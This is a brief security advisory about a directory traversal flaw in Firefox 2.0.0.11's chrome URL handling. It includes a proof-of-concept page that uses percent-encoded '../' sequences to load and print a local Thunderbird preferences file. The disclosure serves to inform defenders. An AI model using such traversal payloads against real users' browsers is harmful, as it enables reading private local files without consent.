|
|
| |
| Firefox doesn't properly handle escaped characters. It is possible to load any JavaScript file on a victims machine. This attack is similar to previously disclosed vulnerabilities but is not constrained to basic Firefox files. |
| |
Credit:
The information has been provided by Gerry Eisenhaur.
The original article can be found at: http://www.hiredhacker.com/2008/01/19/firefox-chrome-url-handling-directory-traversal/
|
| |
Vulnerable Systems:
* Firefox version 2.0.0.11
To exploit this the victim needs to have an extension installed that does not store its contents in a jar archive (such as the Download Statusbar). Gerry created a demo that will read the Mozilla Thunderbird preferences file all.js (C:\Program Files\Mozilla Thunderbird\greprefs\all.js).
This looks very interesting and may have bigger potential, but for now, its just another information disclosure.
Proof of concept:
<script>pref = function(x, y){document.write(x + ' -> ' + y + '<br>');};</script>
<script src='chrome://downbar/content/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e
%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fProgram%20Files
%2fMozilla%20Thunderbird%2fgreprefs%2fall.js'></script>
|
|
|
|
|
|
|
|
